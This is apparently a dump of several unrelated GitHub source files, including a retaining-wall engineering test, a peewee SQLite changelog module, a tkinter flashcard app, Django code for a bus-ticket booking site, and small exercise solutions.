ep.RankineSoil(phi= math.radians(32.5), rho= 19e3/g, gammaMPhi= gammaMPhiM1, beta= slopeOfBackfillSurface) \n\n# Wall materials.\nconcrete= EC2_materials.C25\nsteel= EC2_materials.S500B\n\n# __ __ _ _ _ _ _ \n# \\ \\ / /_ _| | | ___| |__ (_)___ __| |_ \n# \\ \\/\\/ / _` | | | / _ \\ '_ \\| / -_) _| _|\n# \\_/\\_/\\__,_|_|_| \\___/_.__// \\___\\__|\\__|\n# |__/ \n\nwall= ng_retaining_wall.RetainingWall(name= 'A.4_worked_example', stemHeight= retainedHeight, stemBottomWidth= stemBottomWidth, stemTopWidth= stemTopWidth, stemBackSlope= 0.0, footingThickness= footingThickness, bToe= bToe, bHeel= bHeel, concrete= concrete, steel= steel)\n\n# Characteristic total self-weight of wall.\nwallWeight= concrete.density()*wall.getArea()*g\nrefWallWeight= 183e3/10*g\nratioWallWeight= abs(wallWeight-refWallWeight)/refWallWeight\n# Characteristic self-weight of the backfill above the heel.\nbackfillAboveHeelArea= wall.getBackfillAvobeHeelArea(beta= granularFillM1.beta)\nbackfillAboveHeelWeight= granularFillM1.rho*g*backfillAboveHeelArea\nrefBackfillAboveHeelWeight= 274e3\nratioBFWeight= abs(backfillAboveHeelWeight-refBackfillAboveHeelWeight)/refBackfillAboveHeelWeight\nwallWeightOK= (abs(ratioWallWeight)<1e-9 and abs(ratioBFWeight)<1e-4)\n\n# Create wall FE model.\nwallFEModel= wall.createLinearElasticFEModel(prbName= 'Retaining wall '+wall.name, kS= 15e6) # assumed value for subgrade reaction modulus.\npreprocessor= wallFEModel.getPreprocessor\n\n# _ _ _ \n# /_\\ __| |_(_)___ _ _ ___\n# / _ \\/ _| _| / _ \\ ' \\(_-<\n# /_/ \\_\\__|\\__|_\\___/_||_/__/\n \n#Actions.\nloadCaseManager= load_cases.LoadCaseManager(preprocessor)\nloadCaseNames= ['selfWeight','earthPress','liveLoad']\nloadCaseManager.defineSimpleLoadCases(loadCaseNames)\n\n### Partial safety factors on actions (A).\ngammaGA1= 1.35 # Set A1.\ngammaQA1= 1.5 # Set A1.\n\n# _ _ _ ___ _ \n# /_\\ __| |_(_)___ _ _ ___ | _ \\___ _ _ _ __ __ _ _ _ ___ _ _| |_ \n# / _ \\/ _| _| / _ \\ ' \\(_-<_ | _/ -_) '_| ' \\/ _` | ' \\/ -_) ' \\ _|_ \n# /_/ \\_\\__|\\__|_\\___/_||_/__(_) |_| \\___|_| |_|_|_\\__,_|_||_\\___|_||_\\__(_)\n \n## Self weight of the wall.\nselfWeight= loadCaseManager.setCurrentLoadCase('selfWeight')\nWselfk= wall.createSelfWeightLoads(rho= concrete.density(),grav= g)\n### Check characteristic total self-weight of wall:\nratioWselfk= abs(Wselfk.getResultant().y+183e3)/183e3\n\n## Dead load on the heel.\nheelFillDepth= wall.getBackfillAvobeHeelAvgHeight(beta= granularFillM1.beta, zGround= 0.0)\nWfillk= wall.createDeadLoad(heelFillDepth= heelFillDepth, toeFillDepth= 0.0, rho= granularFillM1.rho, grav= g)\n### Check characteristic self weight of backfill\nratioWfillk= abs(Wfillk.getResultant().y+refBackfillAboveHeelWeight)/refBackfillAboveHeelWeight\nweightLoadsOK= (abs(ratioWselfk)<.05 and abs(ratioWfillk)<.01)\n\n## Earth pressure.\n### Backfill soil properties\nKaM1= granularFillM1.Ka()\nratioKa= abs(KaM1-0.365)/0.365\nearthPressureOK= (abs(ratioKa)<1e-2)\ngSoil= granularFillM1.rho*g\nzBottomSoils=[-1e3]\nKSoils= [KaM1]\ngammaSoils= [gSoil]\nzWater= -1e3\ngammaWater= 1000*g\n### Set current load case.\nearthPress= loadCaseManager.setCurrentLoadCase('earthPress')\n\n## Define virtual back.\nvirtualBack= wall.getVirtualBack(beta= granularFillM1.beta)\nratioVirtualBack= abs(virtualBack.getLength()-7.62)/virtualBack.getLength()\nvirtualBackOK= (abs(ratioVirtualBack)<1e-3)\n\n### Earth pressure on back of wall stem.\nbackfillPressureModel= earth_pressure.EarthPressureModel(zGround= virtualBack.getFromPoint().y, zBottomSoils= zBottomSoils, KSoils= KSoils, gammaSoils= gammaSoils, zWater= zWater, gammaWater= gammaWater,qUnif=0)\nEaGk= wall.createBackfillPressures(backfillPressureModel, Delta= granularFillM1.beta, beta= granularFillM1.beta)\nvirtualBackThirdPoint= virtualBack.getToPoint()+virtualBack.getLength()/3.0*geom.Vector2d(0,1)\nEaGkRef= geom.SlidingVectorsSystem2d(virtualBackThirdPoint,-KaM1*0.5*gSoil*virtualBack.getLength()**2*geom.Vector2d(math.cos(granularFillM1.beta), math.sin(granularFillM1.beta)),0.0)\nratioEaGk= (EaGk.getResultant()-EaGkRef.getResultant()).getModulus()/EaGkRef.getResultant().getModulus()\n#### Compare with the result in the book.\nEaGkBook= 201e3\nratioEaGkBook= abs(EaGk.getModulus()-EaGkBook)/EaGkBook \ntoeEndPos= wall.getToeEndNodePosition()\nMGk= EaGk.getMoment(toeEndPos)\nMGkRef= EaGkRef.getMoment(toeEndPos)\nratioMGk= abs(MGk-MGkRef)/MGkRef\nearthPressureGOK= (abs(ratioEaGk)<1e-3 and abs(ratioEaGkBook)<1e-3 and abs(ratioMGk)<.05)\n\n# _ _ _ __ __ _ _ _ \n# /_\\ __| |_(_)___ _ _ ___ \\ \\ / /_ _ _ _(_)__ _| |__| |___ \n# / _ \\/ _| _| / _ \\ ' \\(_-<_ \\ V / _` | '_| / _` | '_ \\ / -_)\n# /_/ \\_\\__|\\__|_\\___/_||_/__(_) \\_/\\__,_|_| |_\\__,_|_.__/_\\___|\n \n### Set current load case.\nliveLoad= loadCaseManager.setCurrentLoadCase('liveLoad')\n### Uniform load on the backfill surface.\nqUnif= 5e3\nunifLoadPressure= earth_pressure.UniformPressureOnBackfill(zGround= virtualBack.getFromPoint().y, zBottomSoils= zBottomSoils, KSoils= KSoils, qUnif= qUnif)\nEaQk= wall.createBackfillPressures(pressureModel= unifLoadPressure, Delta= granularFillM1.beta, beta= granularFillM1.beta)\nvirtualBackMidPoint= virtualBack.getMidPoint()\n\nEaQkRef= geom.SlidingVectorsSystem2d(virtualBackMidPoint, -KaM1*qUnif*virtualBack.getLength()*geom.Vector2d(math.cos(granularFillM1.beta), math.sin(granularFillM1.beta)),0.0)\nratioEaQk= (EaQk.getResultant()-EaQkRef.getResultant()).getModulus()/EaQkRef.getResultant().getModulus()\nEaQkBook= 13.9e3\nratioEaQkBook= abs(EaQk.getModulus()-EaQkBook)/EaQkBook \nMQk= EaQk.getMoment(toeEndPos)\nMQkRef= EaQkRef.getMoment(toeEndPos)\nratioMQk= abs(MQk-MQkRef)/MQkRef\nearthPressureQOK= (abs(ratioEaQk)<1e-3 and abs(ratioEaQkBook)<.005 and abs(ratioMQk)<1e-3)\n\n# ### Uniform load on the heel of the wall\n# VQk= wall.createVerticalLoadOnHeel(unifLoadPressure)\n# ratioVQk= abs(VQk.getResultant().y+11.3e3)/11.3e3\n# MVQk= VQk.getMoment(toeEndPos)\n# QQk= qUnif*wall.bHeel\n# MVQkRef= QQk*(wall.getFootingWidth()-wall.bHeel/2) # There is an error in the arm lever they use in the book. See page 123.\n# ratioMVQk= abs(MVQk+MVQkRef)/MVQkRef\n# uniformLoadOnHeelOK= (abs(ratioVQk)<.01 and abs(ratioMVQk)<.1)\nuniformLoadOnHeelOK= True # Not considered in the book for approach 2.\n\n# Compute design thrust.\nEak= EaGk+EaQk\nEakBook= 214.9e3 # There is an error in the subindices\nratioEakBook= abs(Eak.getResultant().getModulus()-EakBook)/EakBook\n\n# Vertical component of design weight\nNEk= Wselfk.getResultant().y+Wfillk.getResultant().y+Eak.getResultant().y\nNEkBook= 530.5e3\nratioNEk= abs(NEk+NEkBook)/NEkBook\n\n# Compute horizontal component of design thrust.\nHEk= Eak.getResultant().x\nHEkBook= 202e3\nratioHEk= abs(HEk+HEkBook)/HEkBook\n\nresultantOK= (ratioEakBook<1e-3) and abs(ratioHEk)<1e-3 and abs(ratioNEk)<.02\n\n# totalLoad= Eak+Wselfk+Wfillk\n# MtotalLoad= totalLoad.getMoment(toeEndPos)\n# MtotalLoadRef= 332.5e3-1068e3\n# print('total load (A1 set): ', totalLoad)\n# print('design moment about wall toe (A1 set): ', MtotalLoad/1e3, 'kN.m/m')\n# print('reference value of design moment about wall toe (A1 set): ', MtotalLoadRef/1e3, 'kN.m/m')\n\n# ___ _ _ _ _ \n# / __|___ _ __ | |__(_)_ _ __ _| |_(_)___ _ _ ___\n# | (__/ _ \\ ' \\| '_ \\ | ' \\/ _` | _| / _ \\ ' \\(_-<\n# \\___\\___/_|_|_|_.__/_|_||_\\__,_|\\__|_\\___/_||_/__/\n \ncombContainer= combinations.CombContainer()\n\ndef composeCombinationString(gammaG, gammaQ):\n ''' Compose the combination string corresponding to the arguments.\n\n :param gammaG: partial factor for permanent loads.\n :param gammaQ: partial factor for variable loads.\n '''\n #loadCaseNames= ['selfWeight','earthPress','liveLoad']\n gammaGStr= str(gammaG)\n gammaQStr= str(gammaQ)\n retval= gammaGStr+'*selfWeight+'+gammaGStr+'*earthPress'\n if(gammaQ!=0.0):\n retval+= '+'+gammaQStr+'*liveLoad'\n return retval\n\n## GEO ultimate states. (type 1)\ncombContainer.ULS.perm.add('ULS01', composeCombinationString(gammaG= gammaGA1, gammaQ= 0.0))\ncombContainer.ULS.perm.add('ULS02', composeCombinationString(gammaG= gammaGA1, gammaQ= gammaQA1))\ncombContainer.dumpCombinations(preprocessor)\n\n\n# ___ ___ ___ _ __ _ _ _ \n# / __| __/ _ \\ __ _____ _ _(_)/ _(_)__ __ _| |_(_)___ _ _ ___\n# | (_ | _| (_) | \\ V / -_) '_| | _| / _/ _` | _| / _ \\ ' \\(_-<\n# \\___|___\\___/ \\_/\\___|_| |_|_| |_\\__\\__,_|\\__|_\\___/_||_/__/\n# \ngeoULSCombinations= ['ULS01','ULS02']\n\n# GEO verifications\ngammaR2Sliding= 1.1\ngammaR2Bearing= 1.4\n\n## Critical state (constant volume) angle of shearing resistance of the soil.\n## See clause 6.5.3 (10) of Eurocode 7 part 1. \nphi_cv= math.radians(30)\nfoundationSoilModel= fcs.FrictionalCohesiveSoil(phi= granularFillM1.phi, c= 0.0, rho= granularFillM1.rho, phi_cv= phi_cv, gammaMPhi= gammaMPhiM1)\n## Perform GEO verifications.\nsr= wall.performGEOVerifications(geoULSCombinations, foundationSoilModel= foundationSoilModel, toeFillDepth= wall.footingThickness, gammaRSliding= gammaR2Sliding, gammaRBearing= gammaR2Bearing)\n\n\n## Verification of resistance to sliding\nslidingResistanceDegreeOfUtilization= sr.getDegreeOfUtilizationForSliding()\n### There is an error in the book. We repeat the operations here:\nHEdBook= 274.6e3\nNEdBook= 716.9e3\nHRdBook= NEdBook*math.tan(math.radians(30))/gammaR2Sliding\nslidingResistanceDegreeOfUtilizationBook= HEdBook/HRdBook\n### End of book correction.\nratioSDOfU= abs(slidingResistanceDegreeOfUtilization-slidingResistanceDegreeOfUtilizationBook)/slidingResistanceDegreeOfUtilizationBook\n\n## Verification of bearing resistance\nbearingResistanceDegreeOfUtilization= sr.getDegreeOfUtilizationForBearingResistance()\nbearingResistanceDegreeOfUtilizationRef= 0.8442207731905604\n# The value calculated in the book is 99% (and we obtain 84%) the difference\n# is mainly due to the fact that the annex D of the EC7 part 1 (informative)\n# does not consider the depth factos in the Brinch-Hansen formula.\n# bearingResistanceDegreeOfUtilizationBook= 0.99\nratioBRDOfU= abs(bearingResistanceDegreeOfUtilization-bearingResistanceDegreeOfUtilizationRef)/bearingResistanceDegreeOfUtilizationRef\n\n## Verification of resistance to toppling\ntopplingResistanceDegreeOfUtilization= sr.getDegreeOfUtilizationForOverturning()\ntopplingResistanceDegreeOfUtilizationBook= 0.32\nratioTDOfU= abs(topplingResistanceDegreeOfUtilization-topplingResistanceDegreeOfUtilizationBook)/topplingResistanceDegreeOfUtilizationBook\n\ngeoVerificationsOK= (abs(ratioSDOfU)<.05 and abs(ratioBRDOfU)<1e-3 and abs(ratioTDOfU)<.1)\n\n'''\nprint('\\nCheck computation of virtual back.')\nprint('virtual back: ', virtualBack)\nprint('virtual back height: ', virtualBack.getLength())\nprint('ratioVirtualBack= ', ratioVirtualBack)\nprint('virtual back OK: ', virtualBackOK)\n\nprint('\\nCheck computation of the weight of the backfill above the wall heel.')\nprint('bHeel= ',bHeel, 'm')\nprint('wall weight: ', wallWeight/1e3, 'kN/m')\nprint('reference wall weight: ', refWallWeight/1e3, 'kN/m')\nprint('ratioWallWeight= ',ratioWallWeight)\nprint('weight of the backfill above the wall heel: ', backfillAboveHeelWeight/1e3, 'kN/m')\nprint('ratioBFWeight= ',ratioBFWeight)\nprint('Wall weight OK: ', wallWeightOK)\n\nprint('\\nCheck earth pressure coefficients.')\nprint('gSoil= ', gSoil)\nprint('KaM1= ', KaM1)\nprint('ratioKa= ', ratioKa)\nprint('Earte pressure OK: ', earthPressureOK)\n\nprint('\\nCheck weight loads.')\nprint('Wselfk= ', Wselfk.getResultant()*1e-3, 'kN/m')\nprint('ratioWselfk= ', ratioWselfk)\nprint('Wselfd (A1 set)= ', Wselfk)\nprint('Wfilld (A1 set)= ', Wfillk)\nprint('ratioWfillk= ', ratioWfillk)\nprint('Weight loads OK: ', weightLoadsOK)\n\nprint('\\nCheck earth pressure due to backfill weight.')\nprint('EaGk= ', EaGk)\nprint('EaGkRef= ', EaGkRef)\nprint('ratioEaGk= ', ratioEaGk)\nprint('ratioEaGkBook= ', ratioEaGkBook)\nprint('MGk= ', MGk/1e3)\nprint('MGkRef= ', MGkRef/1e3)\nprint('ratioMGk= ', ratioMGk)\nprint('Earth pressure G OK: ', earthPressureGOK)\n\nprint('\\nCheck earth pressure due to surface load.')\nprint('EaQk= ', EaQk, 'modulus: ', EaQk.getModulus()/1e3, 'zero moment line: ', EaQk.zeroMomentLine())\nprint('EaQkRef= ', EaQkRef, 'modulus: ', EaQkRef.getModulus()/1e3, 'zero moment line: ', EaQkRef.zeroMomentLine())\nprint('ratioEaQk= ', ratioEaQk)\nprint('ratioEaQkBook= ', ratioEaQkBook)\nprint('MQk= ', MQk/1e3)\nprint('MQkRef= ', MQkRef/1e3)\nprint('ratioMQk= ', ratioMQk)\nprint('Earth pressure Q OK: ', earthPressureQOK)\n\n# print('\\nCheck uniform load on the heel of the wall.')\n# print('VQk= ', VQk)\n# print('ratioVQk= ', ratioVQk)\n# print('MVQk= ', MVQk/1e3, 'kN.m/m')\n# print('MVQkRef=', MVQkRef/1e3, 'kN.m/m')\n# print('ratioMVQk= ', ratioMVQk)\n# print('Uniform load on heel OK: ', uniformLoadOnHeelOK)\n\nprint('\\nCheck resultant (A1 set).')\nprint('Eak= ', Eak)\nprint('|Eak|= ', Eak.getResultant().getModulus()/1e3,'kN/m')\nprint('EakBook= ', EakBook)\nprint('ratioEakBook= ', ratioEakBook)\nprint('HEk= ', HEk/1e3, 'kN/m')\nprint('ratioHEk= ', ratioHEk)\nprint('NEk= ', NEk/1e3, 'kN/m')\nprint('ratioNEk= ', ratioNEk)\nprint('Resultant OK: ', resultantOK)\n\nprint('\\nCheck sliding degree of utilization.')\nprint('sliding degree of utilization: ', slidingResistanceDegreeOfUtilization)\nprint('sliding degree of utilization book: ', slidingResistanceDegreeOfUtilizationBook)\nprint('ratioSDOfU= ', ratioSDOfU)\nprint('\\nCheck bearing degree of utilization.')\nprint('bearing degree of utilization: ', bearingResistanceDegreeOfUtilization)\nprint('ratioBRDOfU= ', ratioBRDOfU)\nprint('\\nCheck toppling degree of utilization.')\nprint('toppling degree of utilization: ', topplingResistanceDegreeOfUtilization)\nprint('toppling degree of utilization book: ', topplingResistanceDegreeOfUtilizationBook)\nprint('ratioSDOfU= ', ratioTDOfU)\nprint('GEO verifications OK: ', geoVerificationsOK)\n'''\n\nfrom misc_utils import log_messages as lmsg\nfname= os.path.basename(__file__)\nif(wallWeightOK and weightLoadsOK and earthPressureOK and virtualBackOK and earthPressureQOK and uniformLoadOnHeelOK and earthPressureGOK and resultantOK and geoVerificationsOK):\n print('test '+fname+': ok.')\nelse:\n lmsg.error(fname+' ERROR.')\n \n# Graphic output.\n# wall.draw()\n\n'''\n#########################################################\n# Graphic stuff.\nfrom postprocess import output_handler\noh= output_handler.OutputHandler(wall.modelSpace)\n\n## Uncomment to display blocks\n#oh.displayBlocks()\n## Uncomment to display the mesh\n#oh.displayFEMesh()\n\n## Uncomment to display the loads\nwall.modelSpace.addLoadCaseToDomain('earthPress')\noh.displayLoads()\n\n## Uncomment to display the vertical displacement\n#oh.displayDispRot(itemToDisp='uX')\n#oh.displayNodeValueDiagram(itemToDisp='uX')\n\n## Uncomment to display the reactions\n#oh.displayReactions()\n\n## Uncomment to display the internal force\n#oh.displayIntForcDiag('Mz')\n'''\n","repo_name":"xcfem/xc","sub_path":"verif/tests/rough_calculations/earth_retaining/retaining_wall_test_03.py","file_name":"retaining_wall_test_03.py","file_ext":"py","file_size_in_byte":17704,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"23294077110","text":"from peewee import *\nfrom playhouse.sqlite_ext import JSONField\n\n\nclass BaseChangeLog(Model):\n timestamp = DateTimeField(constraints=[SQL('DEFAULT CURRENT_TIMESTAMP')])\n action = TextField()\n table = TextField()\n primary_key = IntegerField()\n changes = JSONField()\n\n\nclass ChangeLog(object):\n # Model class that will serve as the base for the changelog. This model\n # will be subclassed and mapped to your application database.\n base_model = BaseChangeLog\n\n # Template for the triggers that handle updating the changelog table.\n # table: table name\n # action: insert / update / delete\n # new_old: NEW or OLD (OLD is for DELETE)\n # primary_key: table primary key column name\n # column_array: output of build_column_array()\n # change_table: changelog table name\n template = \"\"\"CREATE TRIGGER IF NOT EXISTS %(table)s_changes_%(action)s\n AFTER %(action)s ON %(table)s\n BEGIN\n INSERT INTO %(change_table)s\n (\"action\", \"table\", \"primary_key\", \"changes\")\n SELECT\n '%(action)s', '%(table)s', %(new_old)s.\"%(primary_key)s\", \"changes\"\n FROM (\n SELECT json_group_object(\n col,\n json_array(\n case when json_valid(\"oldval\") then json(\"oldval\")\n else \"oldval\" end,\n case when json_valid(\"newval\") then json(\"newval\")\n else \"newval\" end)\n ) AS \"changes\"\n FROM (\n SELECT json_extract(value, '$[0]') as \"col\",\n json_extract(value, '$[1]') as \"oldval\",\n json_extract(value, '$[2]') as \"newval\"\n FROM json_each(json_array(%(column_array)s))\n WHERE \"oldval\" IS NOT \"newval\"\n )\n );\n END;\"\"\"\n\n drop_template = 'DROP TRIGGER IF EXISTS %(table)s_changes_%(action)s'\n\n _actions = ('INSERT', 'UPDATE', 'DELETE')\n\n def __init__(self, db, table_name='changelog'):\n self.db = db\n self.table_name = table_name\n\n def _build_column_array(self, model, use_old, use_new, skip_fields=None):\n # Builds a list of SQL expressions for each field we are tracking. This\n # is used as the data source for change tracking in our trigger.\n col_array = []\n for field in model._meta.sorted_fields:\n if field.primary_key:\n continue\n\n if skip_fields is not None and field.name in skip_fields:\n continue\n\n column = field.column_name\n new = 'NULL' if not use_new else 'NEW.\"%s\"' % column\n old = 'NULL' if not use_old else 'OLD.\"%s\"' % column\n\n if isinstance(field, JSONField):\n # Ensure that values are cast to JSON so that the serialization\n # is preserved when calculating the old / new.\n if use_old: old = 'json(%s)' % old\n if use_new: new = 'json(%s)' % new\n\n col_array.append(\"json_array('%s', %s, %s)\" % (column, old, new))\n\n return ', '.join(col_array)\n\n def trigger_sql(self, model, action, skip_fields=None):\n assert action in self._actions\n use_old = action != 'INSERT'\n use_new = action != 'DELETE'\n cols = self._build_column_array(model, use_old, use_new, skip_fields)\n return self.template % {\n 'table': model._meta.table_name,\n 'action': action,\n 'new_old': 'NEW' if action != 'DELETE' else 'OLD',\n 'primary_key': model._meta.primary_key.column_name,\n 'column_array': cols,\n 'change_table': self.table_name}\n\n def drop_trigger_sql(self, model, action):\n assert action in self._actions\n return self.drop_template % {\n 'table': model._meta.table_name,\n 'action': action}\n\n @property\n def model(self):\n if not hasattr(self, '_changelog_model'):\n class ChangeLog(self.base_model):\n class Meta:\n database = self.db\n table_name = self.table_name\n self._changelog_model = ChangeLog\n\n return self._changelog_model\n\n def install(self, model, skip_fields=None, drop=True, insert=True,\n update=True, delete=True, create_table=True):\n ChangeLog = self.model\n if create_table:\n ChangeLog.create_table()\n\n actions = list(zip((insert, update, delete), self._actions))\n if drop:\n for _, action in actions:\n self.db.execute_sql(self.drop_trigger_sql(model, action))\n\n for enabled, action in actions:\n if enabled:\n sql = self.trigger_sql(model, action, skip_fields)\n self.db.execute_sql(sql)\n","repo_name":"coleifer/peewee","sub_path":"playhouse/sqlite_changelog.py","file_name":"sqlite_changelog.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","stars":10454,"dataset":"github-code","pt":"31"} +{"seq_id":"70272426010","text":"import csv\r\nimport tkinter as tk\r\n\r\nclass FlashcardGUI:\r\n def __init__(self, master):\r\n self.master = master\r\n self.flashcards = []\r\n self.current_card = 0\r\n self.create_widgets()\r\n self.load_flashcards()\r\n\r\n def create_widgets(self):\r\n # Create a canvas widget for the flashcard\r\n self.flashcard_canvas = tk.Canvas(self.master, width=500, height=300, bg='white')\r\n self.flashcard_canvas.grid(row=0, column=0, columnspan=2)\r\n\r\n # Question label\r\n self.question_label = tk.Label(self.flashcard_canvas, text=\"\", bg='white')\r\n self.flashcard_canvas.create_window(250, 150, window=self.question_label)\r\n\r\n # Answer label\r\n self.answer_label = tk.Label(self.flashcard_canvas, text=\"\", bg='white')\r\n self.flashcard_canvas.create_window(250, 150, window=self.answer_label)\r\n\r\n # Flashcard rectangle\r\n self.flashcard_rect = self.flashcard_canvas.create_rectangle(50, 50, 450, 250, outline='black', width=2)\r\n\r\n # Flip button\r\n self.flip_button = tk.Button(self.master, text=\"Flip\", command=self.flip_card)\r\n self.flip_button.grid(row=1, column=0)\r\n\r\n # Next button\r\n self.next_button = tk.Button(self.master, text=\"Next\", command=self.next_card)\r\n self.next_button.grid(row=1, column=1)\r\n\r\n # Add button\r\n self.add_button = tk.Button(self.master, text=\"Add\", command=self.add_card)\r\n self.add_button.grid(row=2, column=0)\r\n\r\n # Question entry\r\n self.question_text = tk.Label(self.master, text=\"Question:\")\r\n self.question_text.grid(row=3, column=0, sticky='w')\r\n self.question_entry = tk.Entry(self.master)\r\n self.question_entry.grid(row=3, column=1, sticky='nsew')\r\n\r\n # Answer entry\r\n self.answer_text = tk.Label(self.master, text=\"Answer:\")\r\n self.answer_text.grid(row=4, column=0, sticky='w')\r\n self.answer_entry = tk.Entry(self.master)\r\n self.answer_entry.grid(row=4, column=1, sticky='nsew')\r\n\r\n # Set resize behavior\r\n self.master.columnconfigure(0, weight=1)\r\n self.master.rowconfigure(0, weight=1)\r\n\r\n def load_flashcards(self):\r\n with open('flashcards.csv') as flashcards_file:\r\n flashcards_reader = csv.reader(flashcards_file)\r\n for row in flashcards_reader:\r\n self.flashcards.append(row)\r\n\r\n self.show_question()\r\n\r\n def show_question(self):\r\n self.question_label.configure(text=self.flashcards[self.current_card][0])\r\n self.answer_label.configure(text=\"\")\r\n self.flashcard_canvas.coords(self.question_label, 250, 120)\r\n self.flashcard_canvas.itemconfigure(self.flashcard_rect, state='normal')\r\n self.flashcard_canvas.lift(self.flashcard_rect)\r\n self.flashcard_canvas.lift(self.question_label)\r\n self.flip_button.configure(text=\"Flip\")\r\n\r\n def show_answer(self):\r\n self.answer_label.configure(text=self.flashcards[self.current_card][1])\r\n self.flashcard_canvas.coords(self.answer_label, 250, 180)\r\n self.flashcard_canvas.lift(self.answer_label)\r\n self.flip_button.configure(text=\"Flip back\")\r\n\r\n def flip_card(self):\r\n if self.answer_label[\"text\"] == \"\":\r\n self.show_answer()\r\n else:\r\n self.show_question()\r\n\r\n def next_card(self):\r\n self.current_card = (self.current_card + 1) % len(self.flashcards)\r\n self.show_question()\r\n\r\n def add_card(self):\r\n question = self.question_entry.get().strip()\r\n answer = self.answer_entry.get().strip()\r\n\r\n if question and answer:\r\n with open('flashcards.csv', mode='a', newline='') as flashcards_file:\r\n flashcards_writer = csv.writer(flashcards_file)\r\n flashcards_writer.writerow([question, answer])\r\n self.flashcards.append([question, answer])\r\n self.question_entry.delete(0, tk.END)\r\n self.answer_entry.delete(0, tk.END)\r\n self.current_card = len(self.flashcards) - 1\r\n self.show_question()\r\n\r\n def clear_entries(self):\r\n self.question_entry.delete(0, tk.END)\r\n self.answer_entry.delete(0, tk.END)\r\n\r\nif __name__ == \"__main__\":\r\n root = tk.Tk()\r\n root.title(\"Flashcards\")\r\n\r\n app = FlashcardGUI(root)\r\n\r\n root.mainloop()\r\n","repo_name":"Tech-Wizz/flashcards","sub_path":"flashcard.py","file_name":"flashcard.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"29832337394","text":"from django.contrib import admin\nfrom .models import CustomUser\n\n# Actions for CustomUser Model admin panel\n@admin.action(description='Deactive selected user accounts')\ndef deactivate_account(modeladmin, request, queryset):\n for user in queryset:\n user.is_active = False\n user.save()\n \nclass CustomUserAdmin(admin.ModelAdmin):\n\tlist_display = ('pk', 'username', 'first_name', 'last_name', 'email', 'user_type', 'last_login', 'is_active')\n\tlist_filter = ('user_type', 'is_active')\n\tsearch_fields = ('username', 'email', 'first_name', 'last_name')\n\tactions = [deactivate_account]\n\nadmin.site.register(CustomUser, CustomUserAdmin)\n","repo_name":"madnan12/Pytutor","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20740971380","text":"#https://www.codewars.com/kata/57cc975ed542d3148f00015b/train/python\n\n#NotCorrect\ndef check(seq, elem):\n nE = False\n for i in range(len(seq)-1):\n if isinstance(seq[i], int) == True:\n nE = True\n \n else:\n nE = False\n break\n \n if nE == True: \n for i in range(len(seq)-1):\n if elem == seq[i]:\n return True\n else:\n return False\n \n if nE == False:\n for i in range(len(seq)):\n if str(elem) in str(seq[i]):\n return True\n else:\n return False\n\n#Correct\ndef check(seq, elem):\n if elem in seq: \n return True\n else:\n return False","repo_name":"GameDesigner111/CodeWarsTasks","sub_path":"YouOnlyNeedOne_Beginner.py","file_name":"YouOnlyNeedOne_Beginner.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73505293209","text":"from django.views.generic import ListView, CreateView\nfrom .models import Car, Goal, Ticket\nfrom .forms import TicketForm\nfrom django.urls import reverse_lazy\nfrom fpdf import FPDF\nfrom django.shortcuts import render, redirect\nimport datetime\n\nclass CarList(ListView):\n\ttemplate_name = 'home/index.html'\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super().get_context_data(**kwargs)\n\t\treturn context\n\n\tdef get_queryset(self):\n\t\ttime = datetime.datetime.now()\n\t\tcars = Car.objects.all()\n\t\tfor s in cars:\n\t\t\tif s.expire_time.day < time.day and s.expire_time.hour < time.hour:\n\t\t\t\ts.is_avaliable = False\n\t\t\t\ts.save()\n\t\t\telif s.total_chairs == 0:\n\t\t\t\ts.is_avaliable = False\n\t\t\t\ts.save()\n\t\treturn Car.objects.filter(is_avaliable=True)\n\ndef ticket_create(request, pk):\n\tform = TicketForm()\n\tcontext = {\n\t\t'form' : form\n\t}\n\tcar = Car.objects.get(id=pk)\n\tif request.method == \"POST\":\n\t\tform = TicketForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tticket = form.save(commit=False)\n\t\t\tticket.car = car\n\t\t\tticket.save()\n\t\t\tget_ticket = Ticket.objects.latest('id')\n\t\t\treturn redirect(f\"{get_ticket.ticket_pdf.url}\")\n\treturn render(request, 'home/ticket_form.html', context)\n\n\n","repo_name":"ArsalanHabibi14/Bus-Ticket-Booking-Application","sub_path":"car_system/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70068019929","text":"\"\"\"template_python_django URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\n\ngrouped_url_patterns = {\n 'base_patterns': [\n url(r'^status/', include('template_python_django.health.urls')),\n ],\n 'template_python_django_patterns': [\n url(r'^template_python_django/', include('template_python_django.api.urls')),\n ],\n}\n\nurlpatterns = [\n url\n for pattern_list\n in grouped_url_patterns.values()\n for url\n in pattern_list\n]\n","repo_name":"Amsterdam/template_python_django","sub_path":"src/template_python_django/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29880009572","text":"# The collatz sequence\n\ndef collatz(number):\n if number == 1:\n return 1\n if number % 2 == 0:\n print(number // 2)\n return collatz(number // 2)\n else:\n print(number * 3 + 1)\n return collatz(number * 3 + 1)\n\ntry:\n userInput = int(input('Pleasea input integer: '))\n collatz(userInput)\n\nexcept ValueError:\n print('The number must be 